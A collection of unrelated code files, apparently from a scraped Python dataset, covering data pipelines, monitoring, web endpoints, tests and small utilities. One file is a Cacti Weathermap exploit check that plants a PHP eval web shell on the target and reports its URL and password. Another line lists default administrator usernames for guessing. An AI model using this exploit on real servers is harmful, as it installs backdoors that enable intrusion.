CHUNK_KEYS = ('$chunk.datastore_id', '$chunk.bed_id')
INPUT_FILES = BC.INPUT_FILES
OUTPUT_FILES = [
TCP_OUTPUT(FileTypes.CHUNK, "cjson_out", "Chunk sv datastore JSON",
"Chunk sv datastore JSON", "align.datastore.chunked")
]
ALLOWED_TYPES = BC.ALLOWED_TYPES
def datastore_to_bam_files(i_datastore_fn):
"""
Return all external rescources bam files from input datastore json file.
"""
files, _, readcls, _ = datastore_to_datastorefile_objs(
i_datastore_fn, allowed_types=Constants.ALLOWED_TYPES)
dataset_obj = readcls(*[f.path for f in files])
return dataset_obj.toExternalFiles()
def run_main(i_datastore_fn, i_trf_fn, o_json_fn, max_nchunks):
"""
Parameters:
i_datastore_fn --- DataStore json of AlignmentSet or ConsensusAlignmentSet to chunk.
i_trf_fn --- Tandem Repeats in BED
o_json_fn -- Output json file
"""
output_dir = op.dirname(o_json_fn)
basename = 'chunk'
# Chunk input datastore json, generate multiple chunked datastore.json, and
# generate pbcommand.models.PipelineChunk objects
_, _, readcls, ext = datastore_to_datastorefile_objs(
i_datastore_fn, allowed_types=Constants.ALLOWED_TYPES)
bam_fns = datastore_to_bam_files(i_datastore_fn)
# Put bam files into boxes
n_chunks = max(1, min(max_nchunks, len(bam_fns)))
cutoff = math.ceil(len(bam_fns)*1.0/n_chunks)
boxes = put_items_to_boxes(bam_fns, [1 for _ in range(len(bam_fns))], n_chunks, cutoff)
chunks = []
for i, bam_fns_in_box in enumerate(boxes):
out_xml = op.join(output_dir, '{}.{}.{}'.format(basename, i, ext))
out_json = op.join(output_dir, '{}.{}.{}'.format(basename, i, 'datastore.json'))
readcls(*bam_fns_in_box).write(out_xml)
dataset_to_datastore(out_xml, out_json, Constants.TOOL_NAME)
# Create a chunk: get $chunk.datastore_id from chunk,
# use TandemRepeat masker bed as $chunk.bed_id
d = {Constants.CHUNK_KEYS[0]: out_json,
Constants.CHUNK_KEYS[1]: i_trf_fn}
chunk_id = Constants.TOOL_NAME+'_chunk_{}'.format(i) # chunks MUST have unique IDs
chunk = PipelineChunk(chunk_id, **d)
chunks.append(chunk)
log.info("Writing chunk.json to %s", o_json_fn)
write_pipeline_chunks(chunks, o_json_fn,
"created by %s" % Constants.TOOL_ID())
return 0
def rtc_runner(rtc):
"""Resolved tool contract runner."""
max_nchunks = rtc.task.max_nchunks if hasattr(
rtc.task, 'max_nchunks') else Constants.DEFAULT_NCHUNKS
return run_main(i_datastore_fn=rtc.task.input_files[0],
i_trf_fn=rtc.task.input_files[1],
o_json_fn=rtc.task.output_files[0],
max_nchunks=int(max_nchunks))
if __name__ == '__main__':
sys.exit(scatter_main(
args=sys.argv[1:], const=Constants, rtc_runner=rtc_runner, alog=log))
|
StarcoderdataPython
|
12804189
|
<gh_stars>0
import math
line = input().split()
n = int(line[0])
m = int(line[1])
a = int(line[2])
answer = math.ceil(m/a) * math.ceil(n/a)
print(str(int(answer)))
|
StarcoderdataPython
|
3212513
|
# Copyright (c) 2019, <NAME> - SW Consulting. All rights reserved.
# For the licensing terms see LICENSE file in the root directory. For the
# list of contributors see the AUTHORS file in the same directory.
from conans import ConanFile, CMake, tools
from os import sep
class VTKDicomConan(ConanFile):
name = "vtk_dicom"
version = "0.8.10"
description = "DICOM for VTK"
url = "https://github.com/Kai-Wolf-SW-Consulting/Conan-Packages/vtk-dicom"
homepage = "https://github.com/dgobbi/vtk-dicom"
author = "<NAME> - SW Consulting <<EMAIL>>"
license = "BSD 3-Clause"
topics = ("vtk", "dicom")
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
requires = "vtk/8.2.0@kwc/stable"
exports_sources = "FindDICOM.cmake"
def source(self):
zipname = "v{0}.zip".format(self.version)
tools.get(self.homepage + "/archive/" + zipname)
# tools.patch(patch_file="cmake_config.patch", strip=1)
def build(self):
cmake = CMake(self)
cmake.definitions["BUILD_EXAMPLES"] = "OFF"
cmake.definitions["BUILD_PROGRAMS"] = "OFF"
cmake.definitions["BUILD_TESTING"] = "OFF"
vtk_root = self.deps_cpp_info["vtk"].rootpath.replace(sep, '/')
cmake.definitions["CMAKE_PREFIX_PATH"] = vtk_root
cmake.configure(source_folder="vtk-dicom-{0}".format(self.version))
cmake.build()
cmake.install()
def package(self):
self.copy("FindDICOM.cmake", ".", ".")
|
StarcoderdataPython
|
310953
|
<reponame>showa-yojyo/bin
#!/usr/bin/env python
"""async14tcpclient.py: TCP Echo client protocol
Assume that sync14tcpserver.py is running in another console.
Usage:
async14tcpclient.py
"""
import asyncio
async def tcp_echo_client(message, loop):
reader, writer = await asyncio.open_connection(
'127.0.0.1', 8888,
loop=loop)
print(f'Send: {message}')
writer.write(message.encode())
data = await reader.read(100)
print(f'Received: {data.decode()}')
print('Close the socket')
writer.close()
def main():
loop = asyncio.get_event_loop()
message = 'Hello World!'
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
4918078
|
<filename>prometheus/monitoring.py
import requests
from prometheus.metrics import Metrics, BatchMetrics
from prometheus.utils import Time, TimeSince
from prometheus import settings
class Monitor:
metrics_cls = Metrics
def __init__(self, app_name):
self.app_name = app_name
self.metrics = self.metrics_cls.get_instance()
self.app_metric = self.metrics.apps.get(app_name, None)
if not self.app_metric:
self.app_metric = self.metrics.setup_metrics(app_name)
def __call__(self, func):
def inner(*args, **kwargs):
start_time = Time()
self.app_metric['REQUEST_COUNT'].inc()
self.app_metric['REQUEST_IN_PROGRESS'].inc()
error, response = None, None
try:
response = func(*args, **kwargs)
except Exception as exc:
error = exc
status = getattr(response, "status_code", 200 if not error else 400)
self.app_metric['RESPONSE_BY_STATUS'].labels(status=status).inc()
self.app_metric['REQUEST_LATENCY'].observe(
TimeSince(start_time)
)
self.app_metric['REQUEST_IN_PROGRESS'].dec()
if error:
raise error
return response
return inner
monitor = Monitor
class BatchMonitor(Monitor):
metrics_cls = BatchMetrics
def __init__(self, app_name):
super().__init__(app_name=app_name)
self.push_metrics_url = settings.PROMETHEUS_PUSH_METRICS_URL
def __call__(self, func):
def inner(*args, **kwargs):
error, response = None, None
start_time = Time()
self.app_metric['REQUEST_COUNT'].inc()
try:
response = func(*args, **kwargs)
except Exception as exc:
error = exc
self.app_metric["LAST_FAILURE"].set_to_current_time()
else:
self.app_metric["LAST_SUCCESS"].set_to_current_time()
finally:
self.app_metric['TIME_TAKEN'].set(
TimeSince(start_time)
)
self.push_metrics()
if error:
raise error
return response
return inner
def _collect_metrics(self):
metrics = {}
for key, value in self.app_metric.items():
metrics[key] = value.collect()[0].samples[0].value
metrics["APP_NAME"] = self.app_name
return metrics
def push_metrics(self):
print("pushing metrics")
base_url = "%s://%s:%s" % (
settings.PROMETHEUS_METRICS_PROTOCOL, settings.PROMETHEUS_METRICS_HOST, settings.PROMETHEUS_METRICS_PORT)
base_url += self.push_metrics_url
data = self._collect_metrics()
response = requests.post(base_url, data=data)
if response.status_code == 200:
print("metrics pushed successfully")
else:
print(response.content)
print("could not push metrics")
batch_monitor = BatchMonitor
|
StarcoderdataPython
|
141674
|
"""
Nose2 Unit Tests for the clusters module.
"""
from pprint import pprint
from os import environ, getenv
from atlasapi.atlas import Atlas
from atlasapi.organizations import Organization
from atlasapi.teams import TeamRoles
from atlasapi.atlas_users import AtlasUser
from json import dumps
from tests import BaseTests
import logging
from time import sleep
logger = logging.getLogger('test')
class ProjectTests(BaseTests):
def test_00_get_organizations(self):
for each in self.a.Organizations.organizations:
self.assertIsInstance(each, Organization, "An Atlas <Organization> should be returned")
test_00_get_organizations.basic = True
def test_01_get_organization_by_name(self):
for each in self.a.Organizations.organizations:
org_name = each.name
result = self.a.Organizations.organization_by_name(org_name=org_name)
#pprint(result.__dict__)
self.assertIsInstance(result, Organization, "An Atlas <Organization> should be returned")
self.assertEqual(org_name, result.name, "Returned result was not the same.")
test_01_get_organization_by_name.basic = True
def test_02_get_organization_by_id(self):
for each in self.a.Organizations.organizations:
org_id = each.id
result = self.a.Organizations.organization_by_id(org_id)
#pprint(result.__dict__)
self.assertIsInstance(result, Organization, "An Atlas <Organization> should be returned")
self.assertEqual(org_id, result.id, "Returned result was not the same.")
test_02_get_organization_by_id.basic = True
def test_03_get_organization_count(self):
result = self.a.Organizations.count
#pprint(result.__dict__)
self.assertIsInstance(result, int, "The count should be an int")
test_03_get_organization_count.basic = True
|
StarcoderdataPython
|
105502
|
from __future__ import absolute_import
from rest_framework import status
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint, ProjectSettingPermission
from sentry.api.serializers import serialize
from sentry.api.serializers.rest_framework.rule import RuleSerializer
from sentry.integrations.slack import tasks
from sentry.mediators import project_rules
from sentry.models import AuditLogEntryEvent, Rule, RuleStatus
from sentry.web.decorators import transaction_start
class ProjectRuleDetailsEndpoint(ProjectEndpoint):
permission_classes = [ProjectSettingPermission]
@transaction_start("ProjectRuleDetailsEndpoint")
def get(self, request, project, rule_id):
"""
Retrieve a rule
Return details on an individual rule.
{method} {path}
"""
rule = Rule.objects.get(
project=project, id=rule_id, status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE]
)
return Response(serialize(rule, request.user))
@transaction_start("ProjectRuleDetailsEndpoint")
def put(self, request, project, rule_id):
"""
Update a rule
Update various attributes for the given rule.
{method} {path}
{{
"name": "My rule name",
"conditions": [],
"actions": [],
"actionMatch": "all"
}}
"""
rule = Rule.objects.get(project=project, id=rule_id)
serializer = RuleSerializer(context={"project": project}, data=request.data, partial=True)
if serializer.is_valid():
data = serializer.validated_data
kwargs = {
"name": data["name"],
"environment": data.get("environment"),
"project": project,
"action_match": data["actionMatch"],
"conditions": data["conditions"],
"actions": data["actions"],
"frequency": data.get("frequency"),
}
if data.get("pending_save"):
client = tasks.RedisRuleStatus()
kwargs.update({"uuid": client.uuid, "rule_id": rule.id})
tasks.find_channel_id_for_rule.apply_async(kwargs=kwargs)
context = {"uuid": client.uuid}
return Response(context, status=202)
updated_rule = project_rules.Updater.run(rule=rule, request=request, **kwargs)
self.create_audit_entry(
request=request,
organization=project.organization,
target_object=updated_rule.id,
event=AuditLogEntryEvent.RULE_EDIT,
data=updated_rule.get_audit_log_data(),
)
return Response(serialize(updated_rule, request.user))
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@transaction_start("ProjectRuleDetailsEndpoint")
def delete(self, request, project, rule_id):
"""
Delete a rule
"""
rule = Rule.objects.get(
project=project, id=rule_id, status__in=[RuleStatus.ACTIVE, RuleStatus.INACTIVE]
)
rule.update(status=RuleStatus.PENDING_DELETION)
self.create_audit_entry(
request=request,
organization=project.organization,
target_object=rule.id,
event=AuditLogEntryEvent.RULE_REMOVE,
data=rule.get_audit_log_data(),
)
return Response(status=202)
|
StarcoderdataPython
|
9738390
|
<filename>overload/pvf/queries.py
# constructs Z3950/SierraAPI/PlatformAPI queries for particular resource
import logging
from pymarc import Record
from connectors.sierra_z3950 import Z3950_QUALIFIERS, z3950_query
from bibs.patches import remove_oclc_prefix
from logging_setup import LogglyAdapter
module_logger = LogglyAdapter(logging.getLogger('overload'), None)
def platform_status_interpreter(response=None):
"""
iterprets request status codes results and raises appropriate msg to
be passed to gui
args:
response response return by Platform API
return:
(status, response) tuple (str, dict)
"""
module_logger.debug('Interpreting response status code.')
if response is not None:
code = response.status_code
module_logger.info(
'Platform response status code: {}'.format(
code))
if code == 200:
status = 'hit'
elif code == 404:
status = 'nohit'
elif code == 405:
module_logger.error(
'Platform endpoint is not valid. '
'Response text: {}'. format(
response.text))
status = 'error'
elif code >= 500:
status = 'error'
else:
module_logger.error(
'Platform returned unidentified '
'status code: {}, text: {}'.format(
response.status_code,
response.text))
status = None
else:
module_logger.debug(
'No data to query. Skipping request.')
status = 'nohit'
return status
def query_runner(request_dst, session, bibmeta, matchpoint):
"""
picks api endpoint and runs the query
return:
list of InhouseBibMeta instances
"""
if request_dst == 'Platform API':
if matchpoint == '020':
if len(bibmeta.t020) > 0:
module_logger.info(
'Platform bibStandardNo endpoint request, '
'keywords (020): {}'.format(
bibmeta.t020))
response = session.query_bibStandardNo(keywords=bibmeta.t020)
else:
# do not attempt even to make a request to API
response = None
elif matchpoint == '024':
if len(bibmeta.t024) > 0:
module_logger.info(
'Platform bibStandardNo endpoint request, '
'keywords (024): {}'.format(
bibmeta.t024))
response = session.query_bibStandardNo(keywords=bibmeta.t024)
else:
response = None
elif matchpoint == 'sierra_id':
if bibmeta.sierraId is not None and len(bibmeta.sierraId) == 8:
# sierraID must be passed as a list to query_bibId
module_logger.info(
'Platform bibId endpoint request, '
'keywords (sierra id): {}'.format(
bibmeta.sierraId))
response = session.query_bibId(keywords=[bibmeta.sierraId])
else:
response = None
elif matchpoint == '001':
if bibmeta.t001 is not None:
module_logger.info(
'Platform bibControlNo endpoint request, '
'keywords (001): {}'.format(
bibmeta.t001))
stripped, controlNo_without_prefix = remove_oclc_prefix(
bibmeta.t001)
if stripped:
keywords = [bibmeta.t001, controlNo_without_prefix]
else:
keywords = [bibmeta.t001]
module_logger.info(
'Platform bibControlNo endpoint request, '
'keywords (001): {}'.format(
keywords))
response = session.query_bibControlNo(
keywords=keywords)
else:
response = None
else:
module_logger.error(
'Unsupported matchpoint specified: {}'.format(
matchpoint))
raise ValueError(
'unsupported matchpoint specified: {}'.format(
matchpoint))
status = platform_status_interpreter(response)
module_logger.debug('Platform response: {}'.format(
status))
if response is not None:
module_logger.debug(
'Converting Platform response to json')
response = response.json()
return (status, response)
elif request_dst == 'Sierra API':
pass
elif request_dst == 'Z3950':
if matchpoint == '020':
module_logger.debug(
'Vendor query keywords (020): {}'.format(
bibmeta.t020))
qualifier = Z3950_QUALIFIERS['isbn']
keywords = bibmeta.t020
elif matchpoint == '022':
module_logger.debug(
'Vendor query keywords (022): {}'.format(
bibmeta.t022))
qualifier = Z3950_QUALIFIERS['issn']
keywords = bibmeta.t022
elif matchpoint == 'sierra_id':
module_logger.debug(
'Vendor query keywords (sierra id): {}'.format(
bibmeta.sierraId))
qualifier = Z3950_QUALIFIERS['bib number']
keywords = bibmeta.sierraId
# lists
retrieved_bibs = []
if matchpoint in ('020', '022'):
for keyword in keywords:
module_logger.info(
'Z3950 request params: host={}, keyword={}, '
'qualifier={}'.format(
session['host'], keyword, qualifier))
success, results = z3950_query(
target=session,
keyword=keyword,
qualifier=qualifier)
if success:
for item in results:
retrieved_bibs.append(Record(data=item.data))
# strings
elif matchpoint == 'sierra_id':
if keywords and len(keywords) == 8:
module_logger.info(
'Z3950 query params: host={}, keyword={}, '
'qualifier={}'.format(
session['host'], keywords, qualifier))
success, results = z3950_query(
target=session,
keyword=keywords,
qualifier=qualifier)
if success:
for item in results:
retrieved_bibs.append(Record(data=item.data))
else:
module_logger.debug(
'Z3950 request params insufficient. Skipping.')
if len(retrieved_bibs) == 0:
status = 'nohit'
response = None
else:
status = 'hit'
response = retrieved_bibs
module_logger.info(
'Z3950 request results: {}, number of matches: {}'.format(
status, len(retrieved_bibs)))
return status, response
else:
module_logger.error('Unsupported query target: {}'.format(
request_dst))
raise ValueError(
'Unsupported query target: {}'.format(
request_dst))
|
StarcoderdataPython
|
6523937
|
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext as _
class MyMoneyAuthenticationForm(AuthenticationForm):
"""
Override default authentication form for theming only.
"""
def __init__(self, request=None, *args, **kwargs):
super(MyMoneyAuthenticationForm, self).__init__(
request, *args, **kwargs
)
self.fields['username'].widget.attrs.update({
'placeholder': _('Username'),
'class': 'form-control',
})
self.fields['password'].widget.attrs.update({
'placeholder': _('Password'),
'class': 'form-control',
})
|
StarcoderdataPython
|
11389606
|
<gh_stars>0
class Solution:
def wordPattern(self, pattern, str):
"""
:type pattern: str
:type str: str
:rtype: bool
"""
words = str.split(' ')
if len(words) != len(pattern):
return False
hashmap = {}
mapval = {}
for i in range(len(pattern)):
if pattern[i] in hashmap:
if hashmap[pattern[i]] != words[i]:
return False
else:
if words[i] in mapval:
return False
hashmap[pattern[i]] = words[i]
mapval[words[i]] = True
return True
"""
Time Complexity = O(n)
Space Complexity = O(c), c stands for unique count of pattern
Given a pattern and a string str, find if str follows the same pattern.
Here follow means a full match, such that there is a bijection between a letter in pattern and a non-empty word in str.
Example:
Input: pattern = "abba", str = "dog cat cat dog"
Output: true
"""
|
StarcoderdataPython
|
95666
|
<filename>morsecodetoolkit/data/__init__.py
from morsecodetoolkit.data.synthetic_dataset import SyntheticMorseDataset
__all__ = [
"SyntheticMorseDataset"
]
|
StarcoderdataPython
|
6613105
|
"""Sourcefile containing deck builder class for decks with multiple cards"""
from collections import OrderedDict
from copy import deepcopy
from archiTop.base_classes import DeckBuilder
from archiTop.resources import (card_asset_template, card_deck_template,
card_template)
from archiTop.scryfall.data_types import ScryfallCard
class MultiCardDeckBuilder(DeckBuilder):
""""MultiCardDeckBuilder class implementing abstract DeckBuilder class.
Used for card decks with multiple cards."""
def __init__(self, *args):
self.card_deck_json = deepcopy(card_deck_template)
self.contained_objects = []
self.deck_ids = []
self.custom_deck = OrderedDict()
super().__init__(*args)
def __repr__(self):
unique_cards = len(set(self.deck_ids))
return f'CardDeck({len(self.deck_ids)} total cards, {unique_cards} unique cards)'
def _populate_card_template(self, card: ScryfallCard):
"""Creates a new TableTop card object and fills information from card class.
Each card in deck needs one card object, therefore cards with quantity > 1 will be
duplicated.
Same cards, even when duplicated will keep the same ID.
Once populated, card object is inserted into contained_objects and id added to deck_ids.
Args:
card: Card to create card object for
"""
card_json = deepcopy(card_template)
card_json['CardID'] = self.current_card_id
card_json['Nickname'] = card.tabletop_name
# create one object per quantity
for _ in range(card.quantity):
self.contained_objects.append(card_json)
self.deck_ids.append(self.current_card_id)
self.current_card_id += 100
def _populate_card_asset_template(self, card: ScryfallCard):
"""Creates a new TableTop card asset object and fills with information from card class.
There should only exist on card asset template for each unique card.
Therefor cards with quantity > 1 do only get one card asset.
Asset matching is done with insertion order of asset objects.
Order in the ContainedObjects, DeckID's must match the order of card assets.
Once populated, card asset is inserted in custom deck and asset id is incremented.
Args:
card: Card to create asset for
"""
card_asset_json = deepcopy(card_asset_template)
card_asset_json['FaceURL'] = card.image_url
card_asset_json['BackURL'] = self.card_back_url
self.custom_deck[str(self.current_card_asset_id)] = card_asset_json
self.current_card_asset_id += 1
def create_deck(self) -> dict:
"""Create the json structure for the card deck containing multiple cards.
Returns:
TableTop card deck json containing multiple cards
"""
for card in self.cards:
self._populate_card_template(card)
self._populate_card_asset_template(card)
self.card_deck_json['ContainedObjects'] = self.contained_objects
self.card_deck_json['DeckIDs'] = self.deck_ids
self.card_deck_json['CustomDeck'] = self.custom_deck
self.card_deck_json['Transform']['rotZ'] = 180 if self.hidden else 0
return self.card_deck_json
|
StarcoderdataPython
|
4842252
|
known_users = ['admin', 'root', 'administrator', 'cisco', 'guest', 'sa', 'nsroot', 'super', 'ubnt']
|
StarcoderdataPython
|
4879193
|
#-*-coding: UTF-8-*-
import numpy as np
import random
import math
import matplotlib.pyplot as plt
from LHSamples import Sample
import os
############################################
def dispPulse (t,Dp,t1,Tp):
"""
Baker et al. displacement pulse point value (cm)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1:pulse start time(s)
:param Tp:pulse period (s)
:return:discrete displacement value(cm)
"""
discretePulse=Dp/float(2)*np.sin(math.pi*(t-t1-Tp/float(2))/float(Tp))+Dp/float(2)
return discretePulse
############################################
def velPulse (t,Dp,t1,Tp):
"""
Baker et al. velocity pulse point value (cm/s)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1: pulse start time(s)
:param Tp: pulse period (s)
:return: discrete velocity value(cm/s)
"""
discretePulse=(Dp*math.pi)/(Tp*float(2))*np.cos(math.pi*(t-t1-Tp/float(2))/float(Tp))
return discretePulse
############################################acc(g)
def accPulse (t,Dp,t1,Tp):
"""
Baker et al. acceleration pulse point value (g)
:param t: time point(s)
:param Dp: permanent displacement(cm)
:param t1: pulse start time(s)
:param Tp: pulse period (s)
:return: discrete acceleration value(g)
"""
discretePulse=-(Dp*math.pi**2)/(float(2)*Tp**2)*np.sin(math.pi*(t-t1-Tp/float(2))/float(Tp))
return discretePulse/float(981)
############################################
def iterateFunction (Tp,t1,dt,disp):
"""
Calculate error between the original displaceemnt and the displacement pulse model
:param Tp: pulse period (s)
:param t1: pulse start time(s)
:param dt: time interval (s)
:param disp: original displacement time history(cm)
:return: deltaError-mean error
Tp-pulse period (s)
t1=pulse start time(s)
Dp-permanent displacement(cm)
"""
startNumber=int(t1/float(dt))
endNumber=int((t1+Tp)/float(dt))
intervalT=[x*dt for x in range(startNumber,endNumber)]
pulseMotion=[]
counterMotion=disp[startNumber:endNumber]
Dp=sum(disp[-50:])/float(50)
for each in intervalT:
discretePoint=dispPulse(each,Dp,t1,Tp)
pulseMotion.append(discretePoint)
deltaError=sum([(x-y)**2 for x,y in zip(counterMotion,pulseMotion)])/float(endNumber-startNumber)
return deltaError,Tp,t1,Dp
####################################################################
#####################---main program---#############################
####################################################################
fileName="TCU075.txt"
disp=np.loadtxt('dispBaselineCorre/E/'+fileName)
vel=np.loadtxt('velBaselineCorre/E/'+fileName)
acc=np.loadtxt('accBaselineCorre/E/'+fileName)
dt=0.005
numPoint=len(disp)
errorList=[10**10]
TpList=[0]
t1List=[0]
DpList=[0]
nIterate=2000
bounds = [(0.01,10),(20,33)]
instance = Sample(bounds, nIterate)
Tp = instance.LHSample()[:,0]
t1 = instance.LHSample()[:,1]
for i1 in range(nIterate):
errorTerm,TpTerm,t1Term,DpTerm=iterateFunction(Tp[i1],t1[i1],dt,disp)
if errorTerm<errorList[0]:
errorList[0]=errorTerm
TpList[0]=TpTerm
t1List[0]=t1Term
DpList[0]=DpTerm
print ("Tp:",TpList[0])
print ("t1:",t1List[0])
print ("Dp:",DpList[0])
####################################################################
startNumber=int(t1List[0]/float(dt))
endNumber=int((t1List[0]+TpList[0])/float(dt))
intervalT=[x*dt for x in range(startNumber,endNumber)]
counterMotion=disp[startNumber:endNumber]
dispMotion=[]
velMotion=[]
accMotion=[]
for each in intervalT:
discretePoint=dispPulse(each,DpList[0],t1List[0],TpList[0])
dispMotion.append(discretePoint)
velDiscretePoint=velPulse (each,DpList[0],t1List[0],TpList[0])
velMotion.append(velDiscretePoint)
accDiscretePoint=accPulse(each,DpList[0],t1List[0],TpList[0])
accMotion.append(accDiscretePoint)
####################################################################
revisedStart=[0 for x in range(startNumber)]
revisedEnd=[dispMotion[-1] for x in range(endNumber,numPoint)]
revisedEndVel=[0 for x in range(endNumber,numPoint)]
revisedEndAcc=[0 for x in range(endNumber,numPoint)]
revisedDisp=revisedStart+dispMotion+revisedEnd
revisedVel=revisedStart+velMotion+revisedEndVel
revisedAcc=revisedStart+accMotion+revisedEndAcc
residualDisp=[num2-num3 for num2,num3 in zip(disp,revisedDisp)]
residualVel=[num2-num3 for num2,num3 in zip(vel,revisedVel)]
residualAcc=[num2-num3 for num2,num3 in zip(acc,revisedAcc)]
####################################################################
np.savetxt("accPulse/E/"+fileName,revisedAcc,fmt="%f")
np.savetxt("velPulse/E/"+fileName,revisedVel,fmt="%f")
np.savetxt("dispPulse/E/"+fileName,revisedDisp,fmt="%f")
np.savetxt("accResidual/E/"+fileName,residualAcc,fmt="%f")
np.savetxt("velResidual/E/"+fileName,residualVel,fmt="%f")
np.savetxt("dispResidual/E/"+fileName,residualDisp,fmt="%f")
####################################################################
times=[dt*num1 for num1 in range(numPoint)]
plt.subplot(331)
# plt.plot(times,acc,"-k")
plt.plot(times,revisedAcc,"--r")
plt.subplot(334)
plt.plot(times,vel,"-k")
plt.plot(times,revisedVel,"--r")
plt.subplot(337)
plt.plot(times,disp,"-k")
plt.plot(times,revisedDisp,"--r")
plt.show()
|
StarcoderdataPython
|
1777867
|
#!/usr/bin/env python
# encoding: utf-8
from t import T
import requests,urllib2,json,urlparse
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php"
result = {}
result['result']=False
r=None
try:
r=requests.get(url=target_url,timeout=2)
if r.status_code==200:
shell_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
r=requests.get(url=shell_url,timeout=2)
if r.status_code == 200:
result['result'] = True
result['VerifyInfo'] = {}
result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
result['VerifyInfo']['URL'] = ip + "/plugins/weathermap/editor.php"
result['VerifyInfo']['payload'] = 'IP/plugins/weathermap/editor.php'
result['VerifyInfo']['result'] = r.text
result['VerifyInfo']['shellurl'] ='plugins/weathermap/configs/test.php pass is 0'
else:
target_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php"
r=requests.get(url=target_url,timeout=2)
if r.status_code==200:
shell_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
r=requests.get(url=shell_url,timeout=2)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['shellurl'] ='/cacti/plugins/weathermap/configs/test.php pass is 0'
result['result'] = True
result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
result['VerifyInfo']['URL'] = ip + "/cacti/plugins/weathermap/editor.php"
result['VerifyInfo']['payload'] = 'IP/cacti/plugins/weathermap/editor.php'
result['VerifyInfo']['result'] = r.text
except Exception,e:
print e.text
finally:
if r is not None:
r.close()
del r
return result
if __name__ == '__main__':
print P().verify(ip='172.16.31.10',port='80')
|
StarcoderdataPython
|
304008
|
<reponame>winkemoji/snmp-collector
import subprocess
import traceback
def start():
res = subprocess.run(['python', 'superserver.py'])
if res.returncode!=0:
raise Exception
def main():
try:
start()
except BaseException as e:
traceback.print_exc()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
258393
|
#!/usr/bin/env python3
try:
import systemd.daemon
from systemd import journal
systemd_enable=True
except ImportError:
systemd_enable=False
def ready():
if systemd_enable:
systemd.daemon.notify('READY=1')
|
StarcoderdataPython
|
11365190
|
# -*- coding: utf-8 -*-
from unittest import TestCase
from mypretty import httpretty
# import httpretty
import harvester.fetcher as fetcher
from test.utils import LogOverrideMixin
from test.utils import DIR_FIXTURES
class PreservicaFetcherTestCase(LogOverrideMixin, TestCase):
@httpretty.activate
def testPreservicaFetch(self):
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/structural-objects/eb2416ec-ac1e-4e5e-baee-84e3371c03e9/children',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-page-1.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/structural-objects/eb2416ec-ac1e-4e5e-baee-84e3371c03e9/children/?start=100&max=100',
match_querystring=True,
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-page-2.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/8c81f065-b6e4-457e-8b76-d18176f74bee',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-1.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/8c81f065-b6e4-457e-8b76-d18176f74bee/metadata/37db4583-8e8e-4778-ac90-ad443664c5cb',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-2.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/9501e09f-1ae8-4abc-a9ec-6c705ff8fdbe',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-3.xml').read())
])
httpretty.register_uri(
httpretty.GET,
'https://us.preservica.com/api/entity/v6.0/information-objects/9501e09f-1ae8-4abc-a9ec-6c705ff8fdbe/metadata/ec5c46e5-443e-4b6d-81b9-ec2a5252a50c',
responses=[
httpretty.Response(
body=open(DIR_FIXTURES + '/preservica-child-4.xml').read())
])
h = fetcher.PreservicaFetcher(
'https://oakland.access.preservica.com/v6.0/uncategorized/SO_eb2416ec-ac1e-4e5e-baee-84e3371c03e9/',
'usr, pwd')
docs = []
d = h.next()
docs.extend(d)
logger.error(docs[0])
for d in h:
